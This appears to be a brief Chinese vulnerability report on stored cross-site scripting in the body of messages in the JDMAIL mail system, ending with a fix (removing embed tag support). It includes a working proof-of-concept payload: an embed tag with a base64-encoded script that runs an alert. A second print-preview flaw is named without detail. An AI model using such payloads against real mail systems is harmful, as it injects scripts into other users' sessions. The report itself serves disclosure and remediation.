###0x01漏洞简介
JDMAIL金迪邮件系统在邮件正文处存在存储型的XSS漏洞。
###0x02漏洞详情
xss漏洞一:邮件正文测试代码:
```
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgvS2V5Ym9hcmQvKTwvc2NyaXB0Pgo="></embed>
```

漏洞二打印预览

###0x03修复方案
取消对html5标签embed的支持。
暂无评论